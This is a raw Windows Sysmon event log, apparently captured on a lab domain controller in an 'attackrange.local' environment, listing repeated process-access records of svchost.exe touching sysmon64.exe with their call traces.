10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001324Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001323Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.151{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001322Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001321Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001320Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001319Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001318Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001316Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001315Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001314Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001313Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001312Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001311Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001310Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001309Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001308Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001307Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001306Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001305Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001304Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001303Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001302Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.135{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001301Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 